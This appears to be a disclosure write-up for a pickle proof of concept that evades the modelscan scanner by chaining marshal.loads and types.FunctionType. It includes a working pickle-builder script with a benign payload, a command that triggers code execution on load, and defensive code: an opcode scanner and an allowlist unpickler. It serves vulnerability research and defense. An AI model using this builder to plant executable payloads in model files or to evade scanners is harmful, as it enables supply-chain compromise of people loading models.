
Modelscan Bypass PoC: marshal.loads + types.FunctionType

Security Research: Authorized Vulnerability Disclosure

This model file demonstrates a bypass of ProtectAI's modelscan scanner. The pickle payload uses marshal.loads() and types.FunctionType() to achieve code execution. Neither marshal nor types is on modelscan's blocklist, so no flagged global ever appears in the pickle stream and the scanner has nothing to match on.

Bypass Chain

  1. marshal.loads(bytes) → reconstructs a code object from marshaled bytecode embedded in the pickle
  2. types.FunctionType(code_obj, {}) → wraps the code object in a callable function (the empty dict becomes its globals)
  3. func() → executes the embedded code; each step is a plain REDUCE of a global the scanner does not flag

Impact

  • modelscan reports "No issues found" for this file
  • pickle.load(), or torch.load() with weights_only=False, executes arbitrary code
  • torch.load() with weights_only=True (the default since PyTorch 2.6) refuses the file, because its restricted unpickler allows only a fixed set of globals instead of blocking known-bad ones

PoC Verification

modelscan scan -p pytorch_model.bin  # -> No issues found
python3 -c "import pickle; pickle.load(open('pytorch_model.bin', 'rb'))"  # -> RCE
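The chain from the Bypass Chain section and the verification above, as an added example that is not the PoC file in this repository: it hand-assembles a pickle that evaluates types.FunctionType(marshal.loads(code), {})() with a harmless embedded function that only returns a marker string, confirms that pickle.loads() runs it, and adds the two checks a reviewer would want: an opcode scan that flags marshal/types globals without executing anything, and an allowlist unpickler that refuses the file outright. SUSPECT_GLOBALS, AllowlistUnpickler and the sample pickles are my own constructions, not modelscan's rules or its API.

```python
"""Added example: reproduce the marshal.loads + types.FunctionType chain
with a benign payload, then detect it (opcode scan) and block it
(allowlist unpickler).  Nothing here is modelscan's own code."""
import io
import marshal
import pickle
import pickletools
import types


def _payload():
    # Stand-in for attacker code: the real PoC embeds whatever it wants run.
    return "payload executed"


# Marshaled bytecode of the payload, exactly what an attacker would embed.
CODE_BYTES = marshal.dumps(_payload.__code__)


def build_pickle(code_bytes: bytes = CODE_BYTES) -> bytes:
    """Hand-assemble a protocol-3 pickle whose unpickling evaluates
    types.FunctionType(marshal.loads(code_bytes), {})()."""
    size = len(code_bytes).to_bytes(4, "little")
    return b"".join([
        pickle.PROTO, b"\x03",
        pickle.GLOBAL, b"types\nFunctionType\n",          # push types.FunctionType
        pickle.GLOBAL, b"marshal\nloads\n",               # push marshal.loads
        pickle.BINBYTES, size, code_bytes,                # push marshaled code
        pickle.TUPLE1, pickle.REDUCE,                     # marshal.loads(code_bytes)
        pickle.EMPTY_DICT, pickle.TUPLE2, pickle.REDUCE,  # FunctionType(code, {})
        pickle.EMPTY_TUPLE, pickle.REDUCE,                # func()
        pickle.STOP,
    ])


# A benign pickle, constructed here, for comparison.
BENIGN_PICKLE = pickle.dumps({"weights": [0.1, 0.2]})

# Globals that turn bytes into executable code.  Constructed watchlist;
# the write-up states modelscan's own blocklist does not cover them.
SUSPECT_GLOBALS = {
    ("marshal", "loads"),
    ("types", "FunctionType"),
    ("types", "CodeType"),
}

_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def find_suspect_globals(data: bytes) -> list:
    """Return (module, name) pairs referenced by GLOBAL/INST/STACK_GLOBAL
    that are in SUSPECT_GLOBALS.  Static: the pickle is never executed."""
    hits = []
    recent = []  # string constants pushed so far; STACK_GLOBAL consumes the last two
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)   # pickletools yields "module name"
        elif op.name == "STACK_GLOBAL" and len(recent) >= 2:
            module, name = recent[-2], recent[-1]
        else:
            if op.name in _STRING_OPS:
                recent.append(arg)
            continue
        if (module, name) in SUSPECT_GLOBALS:
            hits.append((module, name))
    return hits


class AllowlistUnpickler(pickle.Unpickler):
    """Resolve only explicitly allowed globals.  A blocklist is beaten by
    any module it forgot; an allowlist has no such gap."""
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def load_unsafe(data: bytes):
    """Plain pickle.loads: runs whatever the stream asks for."""
    return pickle.loads(data)


def allowlist_rejects(data: bytes) -> bool:
    """True if the allowlist unpickler refuses the stream."""
    try:
        AllowlistUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    blob = build_pickle()
    print("suspect globals:", find_suspect_globals(blob))
    print("pickle.loads   :", load_unsafe(blob))        # payload runs here
    print("allowlist      :", "rejected" if allowlist_rejects(blob) else "loaded")
```

The opcode scan is the cheap fix for the scanner side: it reads the stream with pickletools.genops and never resolves a global, so it is safe to run on untrusted files. The allowlist unpickler is the loader-side fix and is the same principle torch.load(weights_only=True) applies.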

Responsible Disclosure

Submitted to ProtectAI via Huntr MFV program.
